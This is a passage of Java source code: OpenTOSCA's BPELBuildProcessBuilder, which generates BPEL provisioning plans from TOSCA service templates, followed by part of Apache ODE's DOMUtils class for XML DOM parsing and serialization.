* TopologyTemplate.
* </p>
* <p>
* Copyright 2013 IAAS University of Stuttgart <br>
* <br>
*
* @author Kalman Kepes - [email protected]
*/
public class BPELBuildProcessBuilder extends AbstractBuildPlanBuilder {
final static Logger LOG = LoggerFactory.getLogger(BPELBuildProcessBuilder.class);
// class for initializing properties inside the plan
private final PropertyVariableHandler propertyInitializer;
    // class for initializing the plan output from the boundary definitions of a
    // serviceTemplate
private final ServiceTemplateBoundaryPropertyMappingsToOutputHandler propertyOutputInitializer;
private final BPELScopeBuilder scopeBuilder;
// adds serviceInstance Variable and instanceDataAPIUrl to buildPlans
    // class for finalizing build plans (e.g. when a template didn't receive any
    // provisioning logic and must be filled with empty elements)
private final BPELFinalizer finalizer;
private final BPELPluginHandler bpelPluginHandler;
private final EmptyPropertyToInputHandler emptyPropInit;
private final ChoreographyBuilder choreoBuilder = new ChoreographyBuilder();
private final SimplePlanBuilderServiceInstanceHandler serviceInstanceInitializer;
private final CorrelationIDInitializer correlationHandler;
private final SituationTriggerRegistration sitRegistrationPlugin;
private final BPELPlanHandler planHandler;
private final NodeRelationInstanceVariablesHandler nodeRelationInstanceHandler;
/**
* <p>
* Default Constructor
* </p>
*/
public BPELBuildProcessBuilder(PluginRegistry pluginRegistry) {
super(pluginRegistry);
this.bpelPluginHandler = new BPELPluginHandler(pluginRegistry);
this.scopeBuilder = new BPELScopeBuilder(pluginRegistry);
this.emptyPropInit = new EmptyPropertyToInputHandler(scopeBuilder);
try {
this.planHandler = new BPELPlanHandler();
this.serviceInstanceInitializer = new SimplePlanBuilderServiceInstanceHandler();
this.nodeRelationInstanceHandler = new NodeRelationInstanceVariablesHandler(this.planHandler);
this.sitRegistrationPlugin = new SituationTriggerRegistration();
this.correlationHandler = new CorrelationIDInitializer();
} catch (final ParserConfigurationException e) {
LOG.error("Error while initializing BuildPlanHandler", e);
throw new PlanbuilderRuntimeException("Error while initializing BuildPlanHandler", e);
}
// TODO seems ugly
this.propertyInitializer = new PropertyVariableHandler(this.planHandler);
this.propertyOutputInitializer = new ServiceTemplateBoundaryPropertyMappingsToOutputHandler();
this.finalizer = new BPELFinalizer();
}
/*
* (non-Javadoc)
*
* @see org.opentosca.planbuilder.IPlanBuilder#buildPlan(java.lang.String,
* org.opentosca.planbuilder.model.tosca.TDefinitions, javax.xml.namespace.QName)
*/
private BPELPlan buildPlan(final Csar csar, final TDefinitions definitions,
final TServiceTemplate serviceTemplate) {
// create empty plan from servicetemplate and add definitions
String namespace;
if (serviceTemplate.getTargetNamespace() != null) {
namespace = serviceTemplate.getTargetNamespace();
} else {
namespace = definitions.getTargetNamespace();
}
QName serviceTemplateQname = new QName(serviceTemplate.getTargetNamespace(), serviceTemplate.getId());
if (namespace.equals(serviceTemplateQname.getNamespaceURI())
&& serviceTemplate.getId().equals(serviceTemplateQname.getLocalPart())) {
final String processName = ModelUtils.makeValidNCName(serviceTemplate.getId() + "_buildPlan");
final String processNamespace = serviceTemplate.getTargetNamespace() + "_buildPlan";
AbstractPlan buildPlan =
AbstractBuildPlanBuilder.generatePOG(new QName(processNamespace, processName).toString(), definitions, serviceTemplate, csar);
if (this.choreoBuilder.isChoreographyPartner(serviceTemplate)) {
LOG.debug("Transforming plan to be part of a choreography: ");
buildPlan = this.choreoBuilder.transformToChoreography(buildPlan, csar);
}
LOG.debug("Generated the following abstract prov plan: ");
LOG.debug(buildPlan.toString());
final BPELPlan newBuildPlan =
this.planHandler.createEmptyBPELPlan(processNamespace, processName, buildPlan, OpenTOSCA_BuildPlanOperation);
newBuildPlan.setTOSCAInterfaceName(OpenTOSCA_LifecycleInterface);
newBuildPlan.setTOSCAOperationname(OpenTOSCA_BuildPlanOperation);
this.planHandler.initializeBPELSkeleton(newBuildPlan, csar);
this.nodeRelationInstanceHandler.addInstanceURLVarToTemplatePlans(newBuildPlan, serviceTemplate);
this.nodeRelationInstanceHandler.addInstanceIDVarToTemplatePlans(newBuildPlan, serviceTemplate);
// newBuildPlan.setCsarName(csarName);
this.planHandler.registerExtension("http://www.apache.org/ode/bpel/extensions/bpel4restlight", true,
newBuildPlan);
final Property2VariableMapping propMap =
this.propertyInitializer.initializePropertiesAsVariables(newBuildPlan, serviceTemplate);
// init output
this.propertyOutputInitializer.initializeBuildPlanOutput(definitions, newBuildPlan, propMap,
serviceTemplate);
            // instanceDataAPI handling is done solely through this extension
// initialize instanceData handling
this.serviceInstanceInitializer.appendCreateServiceInstanceVarsAndAnitializeWithInstanceDataAPI(newBuildPlan);
String serviceInstanceUrl =
this.serviceInstanceInitializer.findServiceInstanceUrlVariableName(newBuildPlan);
String serviceInstanceID = this.serviceInstanceInitializer.findServiceInstanceIdVarName(newBuildPlan);
String serviceTemplateUrl =
this.serviceInstanceInitializer.findServiceTemplateUrlVariableName(newBuildPlan);
String planInstanceUrl = this.serviceInstanceInitializer.findPlanInstanceUrlVariableName(newBuildPlan);
this.emptyPropInit.initializeEmptyPropertiesAsInputParam(newBuildPlan, propMap, serviceInstanceUrl,
serviceInstanceID, serviceTemplateUrl, planInstanceUrl,
serviceTemplate, csar);
runPlugins(newBuildPlan, propMap, serviceInstanceUrl, serviceInstanceID, serviceTemplateUrl, planInstanceUrl, csar);
this.correlationHandler.addCorrellationID(newBuildPlan);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainFlowElement(),
"CREATING", serviceInstanceUrl);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainSequenceOutputAssignElement(),
"CREATED", serviceInstanceUrl);
this.serviceInstanceInitializer.appendSetServiceInstanceStateAsChild(newBuildPlan, this.planHandler.getMainCatchAllFaultHandlerSequenceElement(newBuildPlan), "ERROR", serviceInstanceUrl);
this.serviceInstanceInitializer.appendSetServiceInstanceStateAsChild(newBuildPlan, this.planHandler.getMainCatchAllFaultHandlerSequenceElement(newBuildPlan), "FAILED", this.serviceInstanceInitializer.findPlanInstanceUrlVariableName(newBuildPlan));
String planInstanceUrlVarName = this.serviceInstanceInitializer.findPlanInstanceUrlVariableName(newBuildPlan);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainFlowElement(),
"RUNNING", planInstanceUrlVarName);
this.serviceInstanceInitializer.appendSetServiceInstanceState(newBuildPlan,
newBuildPlan.getBpelMainSequenceOutputAssignElement(),
"FINISHED", planInstanceUrlVarName);
this.sitRegistrationPlugin.handle(serviceTemplate, newBuildPlan);
this.finalizer.finalize(newBuildPlan);
return newBuildPlan;
}
LOG.warn("Couldn't create BuildPlan for ServiceTemplate {} in Definitions {} of CSAR {}",
serviceTemplateQname, definitions.getId(), csar.id().csarName());
return null;
}
/*
* (non-Javadoc)
*
* @see org.opentosca.planbuilder.IPlanBuilder#buildPlans(java.lang.String,
* org.opentosca.planbuilder.model.tosca.TDefinitions)
*/
@Override
public List<AbstractPlan> buildPlans(final Csar csar, final TDefinitions definitions) {
final List<AbstractPlan> plans = new ArrayList<>();
for (final TServiceTemplate serviceTemplate : definitions.getServiceTemplates()) {
if (ModelUtils.findServiceTemplateOperation(definitions,OpenTOSCA_LifecycleInterface, OpenTOSCA_BuildPlanOperation) == null) {
LOG.debug("ServiceTemplate {} has no BuildPlan, generating BuildPlan",
serviceTemplate.getId());
final BPELPlan newBuildPlan = buildPlan(csar, definitions, serviceTemplate);
if (newBuildPlan != null) {
LOG.debug("Created BuildPlan "
+ newBuildPlan.getBpelProcessElement().getAttribute("name"));
plans.add(newBuildPlan);
}
} else {
LOG.debug("ServiceTemplate {} has BuildPlan, no generation needed",
serviceTemplate.getId());
}
}
if (!plans.isEmpty()) {
LOG.info("Created {} build plans for CSAR {}", plans.size(), csar.id().csarName());
}
return plans;
}
/**
* <p>
* This method assigns plugins to the already initialized BuildPlan and its TemplateBuildPlans. First there will be
* checked if any generic plugin can handle a template of the TopologyTemplate
* </p>
*
* @param buildPlan a BuildPlan which is already initialized
* @param map a PropertyMap which contains mappings from Template to Property and to variable name of inside
* the BuildPlan
*/
private void runPlugins(final BPELPlan buildPlan, final Property2VariableMapping map,
final String serviceInstanceUrl, final String serviceInstanceID,
final String serviceTemplateUrl, final String planInstanceUrl, final Csar csar) {
for (final BPELScope bpelScope : buildPlan.getTemplateBuildPlans()) {
final BPELPlanContext context = new BPELPlanContext(scopeBuilder, buildPlan, bpelScope, map, buildPlan.getServiceTemplate(),
serviceInstanceUrl, serviceInstanceID, serviceTemplateUrl, planInstanceUrl, csar);
if (bpelScope.getNodeTemplate() != null) {
final TNodeTemplate nodeTemplate = bpelScope.getNodeTemplate();
// if this nodeTemplate has the label running (Property: State=Running), skip
// provisioning and just generate instance data handling
// extended check for OperatingSystem node type
if (isRunning(nodeTemplate)
|| ModelUtils.findNodeType(nodeTemplate, csar).getName().equals(Types.abstractOperatingSystemNodeType.getLocalPart())) {
LOG.debug("Skipping the provisioning of NodeTemplate "
+ bpelScope.getNodeTemplate().getId() + " because state=running is set.");
for (final IPlanBuilderPostPhasePlugin postPhasePlugin : this.pluginRegistry.getPostPlugins()) {
if (postPhasePlugin.canHandleCreate(context, bpelScope.getNodeTemplate())) {
postPhasePlugin.handleCreate(context, bpelScope.getNodeTemplate());
}
}
continue;
}
// generate code for the activity
this.bpelPluginHandler.handleActivity(context, bpelScope, nodeTemplate);
} else if (bpelScope.getRelationshipTemplate() != null) {
// handling relationshiptemplate
final TRelationshipTemplate relationshipTemplate = bpelScope.getRelationshipTemplate();
this.bpelPluginHandler.handleActivity(context, bpelScope, relationshipTemplate);
} else {
this.bpelPluginHandler.handleActivity(context, bpelScope);
}
}
}
}
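// Usage sketch (illustrative): generating build plans for all service templates of a CSAR.
// Obtaining the PluginRegistry, Csar and TDefinitions instances is container-specific and
// assumed to happen elsewhere; only the constructor and buildPlans(...) shown above are used.
//
//   BPELBuildProcessBuilder builder = new BPELBuildProcessBuilder(pluginRegistry);
//   List<AbstractPlan> buildPlans = builder.buildPlans(csar, definitions);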
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.ode.utils;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import java.util.Map;
import javax.xml.namespace.QName;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import javax.xml.transform.Source;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMResult;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.sax.SAXSource;
import javax.xml.transform.stream.StreamSource;
import net.sf.saxon.om.Name11Checker;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.ode.utils.sax.LoggingErrorHandler;
import org.apache.xerces.dom.DOMOutputImpl;
import org.apache.xerces.impl.Constants;
import org.apache.xml.serialize.DOMSerializerImpl;
import org.apache.xml.serialize.OutputFormat;
import org.apache.xml.serialize.XMLSerializer;
import org.w3c.dom.Attr;
import org.w3c.dom.CDATASection;
import org.w3c.dom.CharacterData;
import org.w3c.dom.Comment;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.w3c.dom.ProcessingInstruction;
import org.w3c.dom.Text;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
/**
* Utility class for dealing with the Document Object Model (DOM).
*/
public class DOMUtils {
private static Logger __log = LoggerFactory.getLogger(DOMUtils.class);
/** The namespaceURI represented by the prefix <code>xmlns</code>. */
public static final String NS_URI_XMLNS = "http://www.w3.org/2000/xmlns/";
    private static ThreadLocal<Transformer> __txers = new ThreadLocal<Transformer>();
    private static ThreadLocal<DocumentBuilder> __builders = new ThreadLocal<DocumentBuilder>();
private static TransformerFactory _transformerFactory = TransformerFactory.newInstance();
    private static DocumentBuilderFactory __documentBuilderFactory;
static {
initDocumentBuilderFactory();
}
/**
* Initialize the document-builder factory.
*/
private static void initDocumentBuilderFactory() {
DocumentBuilderFactory f = XMLParserUtils.getDocumentBuilderFactory();
f.setNamespaceAware(true);
__documentBuilderFactory = f;
}
/**
* Returns the value of an attribute of an element. Returns null if the
* attribute is not found (whereas Element.getAttribute returns "" if an
* attrib is not found).
*
* @param el Element whose attrib is looked for
* @param attrName name of attribute to look for
*
* @return the attribute value
*/
static public String getAttribute(Element el, String attrName) {
String sRet = null;
Attr attr = el.getAttributeNode(attrName);
if (attr != null) {
sRet = attr.getValue();
}
return sRet;
}
/**
* @deprecated relies on XMLSerializer which is a deprecated Xerces class, use domToString instead
*/
static public String prettyPrint(Element e) throws IOException {
OutputFormat format = new OutputFormat(e.getOwnerDocument());
format.setLineWidth(65);
format.setIndenting(true);
format.setIndent(2);
StringWriter out = new StringWriter();
XMLSerializer serializer = new XMLSerializer(out, format);
serializer.serialize(e);
return out.toString();
}
public static Element getFirstChildElement(Node node) {
NodeList l = node.getChildNodes();
for (int i = 0; i < l.getLength(); i++) {
if (l.item(i) instanceof Element) return (Element) l.item(i);
}
return null;
}
/**
* Returns the value of an attribute of an element. Returns null if the
* attribute is not found (whereas Element.getAttributeNS returns "" if an
* attrib is not found).
*
* @param el Element whose attrib is looked for
* @param namespaceURI namespace URI of attribute to look for
* @param localPart local part of attribute to look for
*
* @return the attribute value
*/
static public String getAttributeNS(Element el, String namespaceURI,
String localPart) {
String sRet = null;
Attr attr = el.getAttributeNodeNS(namespaceURI, localPart);
if (attr != null) {
sRet = attr.getValue();
}
return sRet;
}
/**
* Concat all the text and cdata node children of this elem and return the
* resulting text.
*
* @param parentEl the element whose cdata/text node values are to be
* combined.
*
     * @return the concatenated string.
*/
static public String getChildCharacterData(Element parentEl) {
if (parentEl == null) { return null; }
Node tempNode = parentEl.getFirstChild();
StringBuffer strBuf = new StringBuffer();
CharacterData charData;
while (tempNode != null) {
switch (tempNode.getNodeType()) {
case Node.TEXT_NODE:
case Node.CDATA_SECTION_NODE:
charData = (CharacterData) tempNode;
strBuf.append(charData.getData());
break;
}
tempNode = tempNode.getNextSibling();
}
return strBuf.toString();
}
    /**
     * Recursively search the given element and its descendants for the first
     * element whose <code>id</code> attribute equals the given value.
     *
     * @param el the element at which to start the search
     * @param id the value of the <code>id</code> attribute to look for
     *
     * @return the matching element, or <code>null</code> if none is found
     */
public static Element getElementByID(Element el, String id) {
if (el == null) { return null; }
String thisId = el.getAttribute("id");
if (id.equals(thisId)) { return el; }
NodeList list = el.getChildNodes();
for (int i = 0; i < list.getLength(); i++) {
Node node = list.item(i);
if (node instanceof Element) {
Element ret = getElementByID((Element) node, id);
if (ret != null) { return ret; }
}
}
return null;
}
/**
* Return the first child element of the given element. Null if no children
* are found.
*
* @param elem Element whose child is to be returned
*
* @return the first child element.
*/
public static Element getFirstChildElement(Element elem) {
return (Element) findChildByType(elem, Node.ELEMENT_NODE);
}
/**
* Given a prefix and a node, return the namespace URI that the prefix has
* been associated with. This method is useful in resolving the namespace
* URI of attribute values which are being interpreted as QNames. If prefix
* is null, this method will return the default namespace.
*
* @param context the starting node (looks up recursively from here)
* @param prefix the prefix to find an xmlns:prefix=uri for
*
* @return the namespace URI or null if not found
*/
public static String getNamespaceURIFromPrefix(Node context, String prefix) {
short nodeType = context.getNodeType();
Node tempNode = null;
switch (nodeType) {
case Node.ATTRIBUTE_NODE: {
tempNode = ((Attr) context).getOwnerElement();
break;
}
case Node.ELEMENT_NODE: {
tempNode = context;
break;
}
default: {
tempNode = context.getParentNode();
break;
}
}
while ((tempNode != null) && (tempNode.getNodeType() == Node.ELEMENT_NODE)) {
Element tempEl = (Element) tempNode;
String namespaceURI = (prefix == null) ? getAttribute(tempEl, "xmlns")
: getAttributeNS(tempEl, NS_URI_XMLNS, prefix);
if (namespaceURI != null) {
return namespaceURI;
}
tempNode = tempEl.getParentNode();
}
return null;
}
/**
* Return the next sibling element of the given element. Null if no more
* sibling elements are found.
*
* @param elem Element whose sibling element is to be returned
*
* @return the next sibling element.
*/
public static Element getNextSiblingElement(Element elem) {
for (Node n = elem.getNextSibling(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == Node.ELEMENT_NODE) { return (Element) n; }
}
return null;
}
    /**
     * Read an attribute whose value is a QName (e.g. <code>tns:foo</code>) and
     * resolve its prefix against the namespace declarations in scope on the
     * element.
     *
     * @param el the element carrying the attribute
     * @param attrName the name of the attribute to read
     *
     * @return the resolved {@link QName}, or <code>null</code> if the attribute is absent
     *
     * @throws IllegalArgumentException if the prefix cannot be resolved to a namespace URI
     */
public static QName getQualifiedAttributeValue(Element el, String attrName)
throws IllegalArgumentException {
String attrValue = DOMUtils.getAttribute(el, attrName);
if (attrValue != null) {
int index = attrValue.indexOf(':');
String attrValuePrefix = (index != -1) ? attrValue.substring(0, index)
: null;
String attrValueLocalPart = attrValue.substring(index + 1);
String attrValueNamespaceURI = DOMUtils.getNamespaceURIFromPrefix(el,
attrValuePrefix);
if (attrValueNamespaceURI != null) {
return new QName(attrValueNamespaceURI, attrValueLocalPart);
}
throw new IllegalArgumentException("Unable to determine "
+ "namespace of '"
+ ((attrValuePrefix != null) ? (attrValuePrefix + ":") : "")
+ attrValueLocalPart + "'.");
}
return null;
}
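    /**
     * Illustrative sketch (not part of the original API): resolve a QName-valued
     * attribute against the in-scope namespace declarations. The XML literal and
     * method name are hypothetical.
     */
    private static QName exampleQualifiedAttributeValue() throws SAXException, IOException {
        Element el = stringToDOM(
            "<foo xmlns:tns=\"urn:example\" type=\"tns:bar\"/>");
        // Returns {urn:example}bar; an unbound prefix raises IllegalArgumentException.
        return getQualifiedAttributeValue(el, "type");
    }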
/**
* Count number of children of a certain type of the given element.
*
* @param elem the element whose kids are to be counted
     * @param nodeType the DOM node type (e.g. {@link Node#ELEMENT_NODE}) to count
*
* @return the number of matching kids.
*/
public static int countKids(Element elem, short nodeType) {
int nkids = 0;
for (Node n = elem.getFirstChild(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == nodeType) {
nkids++;
}
}
return nkids;
}
/**
* This method traverses the DOM and grabs namespace declarations
* on parent elements with the intent of preserving them for children. <em>Note
* that the DOM level 3 document method {@link Element#getAttribute(java.lang.String)}
* is not desirable in this case, as it does not respect namespace prefix
* bindings that may affect attribute values. (Namespaces in DOM are
     * categorically a mess, especially in the context of XML Schema.)</em>
* @param el the starting element
* @return a {@link Map} containing prefix bindings.
*/
public static Map<String, String> getParentNamespaces(Element el) {
HashMap<String,String> pref = new HashMap<String,String>();
Map<String,String> mine = getMyNamespaces(el);
Node n = el.getParentNode();
while (n != null && n.getNodeType() != Node.DOCUMENT_NODE) {
if (n instanceof Element) {
Element l = (Element) n;
NamedNodeMap nnm = l.getAttributes();
int len = nnm.getLength();
for (int i = 0; i < len; ++i) {
Attr a = (Attr) nnm.item(i);
if (isNSAttribute(a)) {
String key = getNSPrefixFromNSAttr(a);
String uri = a.getValue();
// prefer prefix bindings that are lower down in the tree.
if (pref.containsKey(key) || mine.containsKey(key)) continue;
pref.put(key, uri);
}
}
}
n = n.getParentNode();
}
return pref;
}
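    /**
     * Illustrative sketch (not part of the original API): prefixes declared on
     * ancestors are reported for a nested element, while the element's own
     * declarations are not. The XML literal and method name are hypothetical.
     */
    private static Map<String, String> exampleParentNamespaces() throws SAXException, IOException {
        Element root = stringToDOM(
            "<a xmlns:p=\"urn:parent\"><b xmlns:c=\"urn:child\"/></a>");
        Element child = getFirstChildElement(root);
        // Yields {"p" -> "urn:parent"}; "c" is declared on the child itself.
        return getParentNamespaces(child);
    }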
/**
* Construct a {@link NSContext} instance for the supplied element.
* @param el the <code>Element</code> to gather the namespace context for
* @return the <code>NSContext</code>
*/
public static NSContext getMyNSContext(Element el) {
NSContext ns = new NSContext();
ns.register(getParentNamespaces(el));
ns.register(getMyNamespaces(el));
return ns;
}
public static Map<String,String> getMyNamespaces(Element el) {
HashMap<String,String> mine = new HashMap<String,String>();
NamedNodeMap nnm = el.getAttributes();
int len = nnm.getLength();
for (int i=0; i < len; ++i) {
Attr a = (Attr) nnm.item(i);
if (isNSAttribute(a)) {
mine.put(getNSPrefixFromNSAttr(a),a.getValue());
}
}
return mine;
}
/**
* Test whether an attribute contains a namespace declaration.
* @param a an {@link Attr} to test.
* @return <code>true</code> if the {@link Attr} is a namespace declaration
*/
public static boolean isNSAttribute(Attr a) {
assert a != null;
String s = a.getNamespaceURI();
return (s != null && s.equals(NS_URI_XMLNS));
}
    /**
     * Fetch the non-null namespace prefix from an {@link Attr} that declares
     * a namespace. (The DOM APIs will return <code>null</code> for a non-prefixed
     * declaration.)
     * @param a the {@link Attr} with the declaration (must be non-<code>null</code>).
     * @return the namespace prefix or <code>""</code> if none was
     * declared, e.g., <code>xmlns="foo"</code>.
     */
public static String getNSPrefixFromNSAttr(Attr a) {
assert a != null;
assert isNSAttribute(a);
if (a.getPrefix() == null) {
return "";
}
return a.getName().substring(a.getPrefix().length()+1);
}
/**
* Convert a DOM node to a stringified XML representation.
*/
static public String domToString(Node node) {
if (node == null) {
throw new IllegalArgumentException("Cannot stringify null Node!");
}
String value = null;
short nodeType = node.getNodeType();
if (nodeType == Node.ELEMENT_NODE || nodeType == Node.DOCUMENT_NODE || nodeType == Node.DOCUMENT_FRAGMENT_NODE) {
// serializer doesn't handle Node type well, only Element
DOMSerializerImpl ser = new DOMSerializerImpl();
ser.setParameter(Constants.DOM_NAMESPACES, Boolean.TRUE);
ser.setParameter(Constants.DOM_WELLFORMED, Boolean.FALSE );
ser.setParameter(Constants.DOM_VALIDATE, Boolean.FALSE);
// create a proper XML encoding header based on the input document;
// default to UTF-8 if the parent document's encoding is not accessible
String usedEncoding = "UTF-8";
Document parent = node.getOwnerDocument();
if (parent != null) {
String parentEncoding = parent.getXmlEncoding();
if (parentEncoding != null) {
usedEncoding = parentEncoding;
}
}
// the receiver of the DOM
DOMOutputImpl out = new DOMOutputImpl();
out.setEncoding(usedEncoding);
// we write into a String
StringWriter writer = new StringWriter(4096);
out.setCharacterStream(writer);
// out, ye characters!
ser.write(node, out);
writer.flush();
// finally get the String
value = writer.toString();
} else {
value = node.getNodeValue();
}
return value;
}
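    /**
     * Illustrative sketch (not part of the original API): stringify a parsed
     * element. The XML literal and method name are hypothetical.
     */
    private static String exampleDomToString() throws SAXException, IOException {
        Element el = stringToDOM("<greeting xmlns=\"urn:example\">hi</greeting>");
        // Serializes the element with namespaces preserved and no validation.
        return domToString(el);
    }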
public static void serialize(Element elmt, OutputStream ostr) {
String usedEncoding = "UTF-8";
Document parent = elmt.getOwnerDocument();
if (parent != null) {
String parentEncoding = parent.getXmlEncoding();
if (parentEncoding != null) {
usedEncoding = parentEncoding;
}
}
DOMOutputImpl out = new DOMOutputImpl();
out.setEncoding(usedEncoding);
DOMSerializerImpl ser = new DOMSerializerImpl();
out.setByteStream(ostr);
ser.write(elmt, out);
}
/**
* Convert a DOM node to a stringified XML representation.
*/
static public String domToStringLevel2(Node node) {
if (node == null) {
throw new IllegalArgumentException("Cannot stringify null Node!");
}
String value = null;
short nodeType = node.getNodeType();
if (nodeType == Node.ELEMENT_NODE || nodeType == Node.DOCUMENT_NODE) {
// serializer doesn't handle Node type well, only Element
DOMSerializerImpl ser = new DOMSerializerImpl();
ser.setParameter(Constants.DOM_NAMESPACES, Boolean.TRUE);
ser.setParameter(Constants.DOM_WELLFORMED, Boolean.FALSE );
ser.setParameter(Constants.DOM_VALIDATE, Boolean.FALSE);
// the receiver of the DOM
DOMOutputImpl out = new DOMOutputImpl();
out.setEncoding("UTF-8");
// we write into a String
StringWriter writer = new StringWriter(4096);
out.setCharacterStream(writer);
// out, ye characters!
ser.write(node, out);
writer.flush();
// finally get the String
value = writer.toString();
} else {
value = node.getNodeValue();
}
return value;
}
/**
* Return the first child element of the given element which has the given
* attribute with the given value.
*
* @param elem the element whose children are to be searched
* @param attrName the attrib that must be present
* @param attrValue the desired value of the attribute
*
* @return the first matching child element.
*/
public static Element findChildElementWithAttribute(Element elem,
String attrName, String attrValue) {
for (Node n = elem.getFirstChild(); n != null; n = n.getNextSibling()) {
if (n.getNodeType() == Node.ELEMENT_NODE) {
if (attrValue.equals(DOMUtils.getAttribute((Element) n, attrName))) { return (Element) n; }
}
}
return null;
}
    /**
     * Parse a String into a DOM and return its document element.
     *
     * @param s the XML text to parse
     *
     * @return the document element of the parsed XML
     *
     * @throws SAXException if the text is not well-formed XML
     * @throws IOException if an I/O error occurs while reading the string
     */
static public Element stringToDOM(String s) throws SAXException, IOException {
return parse(new InputSource(new StringReader(s))).getDocumentElement();
}
/**
* Perform a naive check to see if a document is a WSDL document
* based on the root element name and namespace URI.
* @param d the {@link Document} to check
* @return <code>true</code> if the root element appears correct
*/
public static boolean isWsdlDocument(Document d) {
Element e = d.getDocumentElement();
String uri = e.getNamespaceURI();
String localName = e.getLocalName();
if (uri == null || localName == null) { return false; }
return uri.equals(WSDL_NS) && localName.equals(WSDL_ROOT_ELEMENT);
}
/**
* Perform a naive check to see if a document is an XML schema document
* based on the root element name and namespace URI.
* @param d the {@link Document} to check
* @return <code>true</code> if the root element appears correct
*/
public static boolean isXmlSchemaDocument(Document d) {
Element e = d.getDocumentElement();
String uri = e.getNamespaceURI();
String localName = e.getLocalName();
if (uri == null || localName == null) { return false; }
return uri.equals(XSD_NS) && localName.equals(XSD_ROOT_ELEMENT);
}
public static final String WSDL_NS = "http://schemas.xmlsoap.org/wsdl/";
public static final String WSDL_ROOT_ELEMENT = "definitions";
public static final String XSD_NS = "http://www.w3.org/2001/XMLSchema";
public static final String XSD_ROOT_ELEMENT = "schema";
    /**
     * Copy ("pancake") every namespace declaration visible on the ancestors of
     * the given element directly onto the element itself.
     *
     * @param el the element that receives the inherited namespace declarations
     */
public static void pancakeNamespaces(Element el) {
Map ns = getParentNamespaces(el);
Document d = el.getOwnerDocument();
assert d != null;
Iterator it = ns.keySet().iterator();
while (it.hasNext()) {
String key = (String) it.next();
String uri = (String) ns.get(key);
Attr a = d.createAttributeNS(NS_URI_XMLNS,
(key.length() != 0)?("xmlns:" + key):("xmlns"));
a.setValue(uri);
el.setAttributeNodeNS(a);
}
}
public static Document newDocument() {
DocumentBuilder db = getBuilder();
return db.newDocument();
}
/**
* Parse an XML stream using the pooled document builder.
* @param inputStream input stream
* @return parsed XML document
*/
public static Document parse(InputStream inputStream) throws SAXException, IOException {
return parse(new InputSource(inputStream));
}
/**
* Parse an XML document located using an {@link InputSource} using the
* pooled document builder.
*/
public static Document parse(InputSource inputSource) throws SAXException,IOException{
DocumentBuilder db = getBuilder();
return db.parse(inputSource);
}
/**
* Parse an XML document located using an {@link InputSource} using the
* pooled document builder.
*/
public static Document sourceToDOM(Source inputSource) throws IOException {
try {
/*
// Requires JDK 1.6+
if (inputSource instanceof StAXSource) {
StAXSource stax = (StAXSource) inputSource;
//if (stax.getXMLEventReader() != null || sax.getXMLStreamReader() != null) {
if (sax.getXMLStreamReader() != null) {
return parse(stax.getXMLStreamReader());
}
}
*/
if (inputSource instanceof SAXSource) {
InputSource sax = ((SAXSource) inputSource).getInputSource();
if (sax.getCharacterStream() != null || sax.getByteStream() != null) {
return parse( ((SAXSource) inputSource).getInputSource() );
}
}
if (inputSource instanceof DOMSource) {
Node node = ((DOMSource) inputSource).getNode();
if (node != null) {
return toDOMDocument(node);
}
}
if (inputSource instanceof StreamSource) {
StreamSource stream = (StreamSource) inputSource;
if (stream.getReader() != null || stream.getInputStream() != null) {
return toDocumentFromStream( (StreamSource) inputSource);
}
}
DOMResult domresult = new DOMResult(newDocument());
Transformer txer = getTransformer();
txer.transform(inputSource, domresult);
return (Document) domresult.getNode();
} catch (SAXException e) {
throwIOException(e);
} catch (TransformerException e) {
throwIOException(e);
}
throw new IllegalArgumentException("Cannot parse XML source: " + inputSource.getClass());
}
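    /**
     * Illustrative sketch (not part of the original API): convert a StreamSource
     * backed by a String into a Document. The XML literal and method name are
     * hypothetical.
     */
    private static Document exampleSourceToDOM() throws IOException {
        Source src = new StreamSource(new StringReader("<doc><item/></doc>"));
        // Dispatches on the Source subtype; here the StreamSource branch is taken.
        return sourceToDOM(src);
    }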
/**
* Check that an element is empty, i.e., it contains no non-whitespace text or
* elements as children.
* @param el the element
* @return <code>true</code> if the element is empty, <code>false</code> if not.
*/
public static boolean isEmptyElement(Element el) {
NodeList nl = el.getChildNodes();
int len = nl.getLength();
for (int i=0; i < len; ++i) {
switch (nl.item(i).getNodeType()) {
case Node.CDATA_SECTION_NODE:
case Node.TEXT_NODE:
String s = nl.item(i).getNodeValue();
if (s != null && s.trim().length() > 0) {
return false;
}
break;
case Node.ELEMENT_NODE:
return false;
}
}
return true;
}
public static QName getNodeQName(Node el) {
String localName = el.getLocalName();
String namespaceUri = el.getNamespaceURI();
if (localName == null) {
String nodeName = el.getNodeName();
int colonIndex = nodeName.indexOf(":");
if (colonIndex > 0) {
